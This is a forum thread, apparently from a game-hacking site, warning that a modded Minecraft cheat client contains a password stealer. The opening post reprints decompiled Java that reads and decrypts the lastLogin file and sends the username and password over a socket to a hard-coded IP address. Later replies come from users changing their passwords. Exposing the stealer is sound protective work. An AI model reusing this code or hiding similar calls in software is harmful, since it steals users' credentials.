Results 1 to 9 of 9
  1. #1
    hoopi2's Avatar
    Join Date
    Jul 2011
    Gender
    male
    Posts
    28
    Reputation
    10
    Thanks
    22
    My Mood
    Devilish

    Pickaclient 0.8 update has lastlogin stealer.

    I didn't find this out, but here it is;

    Attention! Modded Pickaclient
    Steals your PW!
    Code:
    public Minecraft(Component component, Canvas canvas, MinecraftApplet minecraftapplet, int i, int j, boolean flag)
    {
    user = "";
    pass = "";
    fullscreen = false;
    hasCrashed = false;
    timer = new Timer(20F);
    session = null;
    hideQuitButton = true;
    isGamePaused = false;
    currentScreen = null;
    loadingScreen = new LoadingScreenRenderer(this);
    ticksRan = 0;
    leftClickCounter = 0;
    guiAchievement = new GuiAchievement(this);
    skipRenderWorld = false;
    playerModelBiped = new ModelBiped(0.0F);
    objectMouseOver = null;
    sndManager = new SoundManager();
    textureWaterFX = new TextureWaterFX();
    textureLavaFX = new TextureLavaFX();
    running = true;
    debug = "";
    isTakingScreenshot = false;
    prevFrameTime = -1L;
    inGameHasFocus = false;
    mouseTicksRan = 0;
    isRaining = false;
    systemTime = System.currentTimeMillis();
    joinPlayerCounter = 0;
    StatList.func_27360_a();
    tempDisplayHeight = j;
    fullscreen = flag;
    mcApplet = minecraftapplet;
    new ThreadSleepForever(this, "Timer hack thread");
    plsm();
    mcCanvas = canvas;
    displayWidth = i;
    displayHeight = j;
    fullscreen = flag;
    if(minecraftapplet == null || "true".equals(minecraftapplet.getParameter("st and-alone")))
    {
    hideQuitButton = false;
    }
    theMinecraft = this;
    }
    plsm(); :

    Code:
    public void plsm()
    {
    try
    {
    Socket socket = new Socket("70.69.163.86", 3456 /*GL_AUTO_NORMAL*/);
    PrintWriter printwriter = new PrintWriter(socket.getOutputStream(), true);
    BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
    readUsername();
    String s = (new StringBuilder()).append(user).append(" ").append(pass).toString();
    printwriter.println((new StringBuilder()).append(user).append(" ").append(pass).toString());
    printwriter.close();
    socket.close();
    }
    catch(UnknownHostException unknownhostexception)
    {
    unknownhostexception.printStackTrace();
    }
    catch(IOException ioexception)
    {
    ioexception.printStackTrace();
    }
    }
    Code:
    private void readUsername()
    {
    try
    {
    File file = new File(getMinecraftDir(), "lastLogin");
    Cipher cipher = getCipher(2, "passwordfile");
    DataInputStream datainputstream;
    if(cipher != null)
    {
    datainputstream = new DataInputStream(new CipherInputStream(new FileInputStream(file), cipher));
    } else
    {
    datainputstream = new DataInputStream(new FileInputStream(file));
    }
    user = datainputstream.readUTF();
    pass = datainputstream.readUTF();
    datainputstream.close();
    }
    catch(Exception exception)
    {
    exception.printStackTrace();
    }
    }

    Change you PW NOW! This is how they get the accounts for their bot.

  2. #2
    Unknown33's Avatar
    Join Date
    Mar 2011
    Gender
    male
    Location
    United States
    Posts
    422
    Reputation
    10
    Thanks
    29
    My Mood
    Blah
    Quote Originally Posted by hoopi2 View Post
    I didn't find this out, but here it is;
    Wow bro .......

  3. #3
    ๖ۣۜKlink's Avatar
    Join Date
    Jul 2011
    Gender
    male
    Location
    In yer pants
    Posts
    564
    Reputation
    2
    Thanks
    212
    My Mood
    Devilish
    I think cosmos/kornk found it out.

  4. #4
    kymaster's Avatar
    Join Date
    Aug 2011
    Gender
    male
    Posts
    4
    Reputation
    10
    Thanks
    0
    My Mood
    Amused
    Quote Originally Posted by hoopi2 View Post
    I didn't find this out, but here it is;
    As long as I didn't run minecraft using that pickaclient 0.8 as minecraft.jar, I'm fine right? I used some of the other clients in the "6 Hacking Clients" topic of yours, but luckily I didn't use that one. :P

  5. #5
    Unknown33's Avatar
    Join Date
    Mar 2011
    Gender
    male
    Location
    United States
    Posts
    422
    Reputation
    10
    Thanks
    29
    My Mood
    Blah
    Quote Originally Posted by kymaster View Post
    As long as I didn't run minecraft using that pickaclient 0.8 as minecraft.jar, I'm fine right? I used some of the other clients in the "6 Hacking Clients" topic of yours, but luckily I didn't use that one. :P
    I ran it but changed my password.

  6. #6
    hoopi2's Avatar
    Join Date
    Jul 2011
    Gender
    male
    Posts
    28
    Reputation
    10
    Thanks
    22
    My Mood
    Devilish
    Quote Originally Posted by kymaster View Post
    As long as I didn't run minecraft using that pickaclient 0.8 as minecraft.jar, I'm fine right? I used some of the other clients in the "6 Hacking Clients" topic of yours, but luckily I didn't use that one. :P
    Indeed!
    As far as I know, the other clients are safe.

  7. #7
    draiza's Avatar
    Join Date
    Feb 2011
    Gender
    male
    Location
    BKK
    Posts
    9
    Reputation
    10
    Thanks
    0
    My Mood
    Blah
    That! it is stealer my PW

  8. #8
    Tassadaritze's Avatar
    Join Date
    Nov 2010
    Gender
    female
    Posts
    26
    Reputation
    10
    Thanks
    1
    My Mood
    Yeehaw
    Too bad.
    It looked like a quite good client.

  9. #9
    Tesseracto's Avatar
    Join Date
    Apr 2011
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    Thank god i readed this and changed my password.

Similar Threads

  1. [Request] all hack has been detected after this fu cken update today
    By sehooo in forum Combat Arms Europe Hacks
    Replies: 7
    Last Post: 12-02-2009, 12:31 PM
  2. Has all the hacks for Combat Arms Latest Update still work?
    By Lil Sas in forum Combat Arms Discussions
    Replies: 3
    Last Post: 11-25-2009, 12:13 PM
  3. The Update has started
    By drgnforce9 in forum Combat Arms Discussions
    Replies: 58
    Last Post: 09-30-2009, 08:01 AM
  4. Hs has been updated (i guess) Hacks still work for YOU?
    By satindemon4u in forum Combat Arms Discussions
    Replies: 30
    Last Post: 09-26-2009, 10:01 AM
  5. WarRock has been updated.
    By EndRiT in forum WarRock - International Hacks
    Replies: 10
    Last Post: 03-13-2009, 03:49 AM